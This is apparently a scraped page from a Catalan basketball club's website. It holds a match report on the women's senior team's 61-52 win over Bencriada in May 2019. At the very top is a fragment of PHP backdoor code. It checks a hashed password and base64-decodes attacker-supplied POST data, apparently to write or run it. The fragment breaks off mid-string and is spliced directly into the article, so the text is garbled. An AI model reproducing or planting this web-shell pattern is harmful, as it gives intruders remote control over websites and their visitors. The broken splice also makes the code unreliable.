function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El sènior reacciona a còpia de lluita i defensa, tomba el Bencriada i surt de la zona de descens directe (61-52) - Tgn Bàsquet Club -

El sènior reacciona a còpia de lluita i defensa, tomba el Bencriada i surt de la zona de descens directe (61-52)

Updated: maig 1, 2019

En el dia internacional del treballador les jugadores del sènior del TGN Bàsquet van retre homenatge a la celebració d’una jornada tan especial pencant de valent. Les noies que entrena Juan Carlos Arjona van vèncer en un partit que era cabdal. La victòria era necessària per sortir de les places de descens directe (els tres últims classificats) i més després de la derrota d’ahir a la nit del Sant Fruitós (que té l’average guanyat al TGN Bàsquet) contra el Viladecans (33-65). Amb aquest triomf, el conjunt tarragoní depèn d’ell mateix per a evitar el descens directe quan queden dues jornades per a la finalització de la fase regular. Amb tot, el TGN Bàsquet haurà de disputar la promoció de permanència (al millor de tres partits, entre els equips classificats entre la desena i tretzena posició), tot i que encara és aviat per saber quin pot ser el rival.

De menys a més

La trascendència del partit es va notar de seguida a les files locals. Les tarragonines van estar molt imprecises, massa nervioses potser, víctimes de l’ansietat de saber que havien de guanyar com fos. Això va permetre el Bencriada dominar el partit a l’inici, gaudint de diferències de fins a 12 punts (4-16, minut 6). Tot i que encara faltava molt, el pes de les cinc derrotes seguides es notava i sobrevolava un pavelló del Sagrat Cor que, tot i ser un dia festiu, va registrar un altre ple a les graderies. Un parell de bones accions d’una de les capitanes, Laura Vilamajor, va apropar el TGN Bàsquet al seu rival (14-19 al final del primer quart) i tot semblava que el rumb es podria redreçar ben aviat.

Però va costar més del previst. El Bencriada no es va donar per vençut i en el segon quart va tornar a manar amb autoritat (16-26 a 7 minuts del descans). Les locals van tornar a precipitar-se, passades de revolucions, sense punteria en el tir exterior i el partit es va convertir en un desgavell d’anades i vingudes amb constants pèrdues de pilota i tirs fallats pels dos equips. En el caos, el TGN Bàsquet va sobreviure millor. Aferrat a bons minuts defensius, a l’agressivitat que tant necessitava, les locals van anar retallant diferències fins a situar-se a només 3 punts del seu adversari (30-33) moment en el qual s’arribava al descans.

Semblava que el pitjor ja havia passat. Quedava mig partit i s’havia aturat el cop, la sagnia. Hi havia temps de remuntar, i així es va fer. Per no perdre el costum, però, les de Banyoles van tornar a fer un bon inici de període (32-37) però, a diferència dels dos períodes anteriors, la reacció de les liles va ser fulgurant. L’entrada a pista de Núria Vilamajor va aportar frescor a l’equip en un moment en què un dels baluards ofensiu del conjunt tarragoní despertava. Cristina Peña, que les havia vist quadrades en la primera meitat va trobar el camí cap al cèrcol. No ho va fer des de la llarga distància que, com tot l’equip, no va anotar (0/12 triples), sinó des de posicions pròximes al tauler. Peña va obrir el pot de les essències i amb una passada d’esquena en un revers enmig d’un contraatac a la petita de les Vilamajor i després amb una cistella en transició, capgirava el resultat: 38-37 i temps mort  de l’entrenadora rival.

El TGN Bàsquet no es va aturar, des de la solidesa en el rebot de Laia López passant a la personalitat de Laura Vilamajor, l’equip es va consolidar en el domini i va acabar el quart 8 punts per sobre, 48-39. El parcial havia estat de 16-2 en 6 minuts.

En l’últim període la victòria no va córrer perill. El matx continuava boig, en una cursa sense pausa però el Bencriada no tenia encert i les pilotes dividides eren per les locals, que no dubtaven un segon a tirar-se a terra per recuperar-les. La diferència va ser de fins a 11 punts (52-41) però les visitants, tot i estar descendides de fa algunes jornades i veure aquest desavantatge, no van deixar de lluitar. La seva competitivitat les honora. El partit va transcórrer sense més sobresalts i l’alegria va tornar a un pavelló del Sagrat Cor que bé que ho necessitava.

El pavelló lila serà l’escenari d’un nou partit aquest diumenge a les 17.30 h contra el CEJ l’Hospitalet en el que suposarà una nova final per a les jugadores de Juan Carlos Arjona.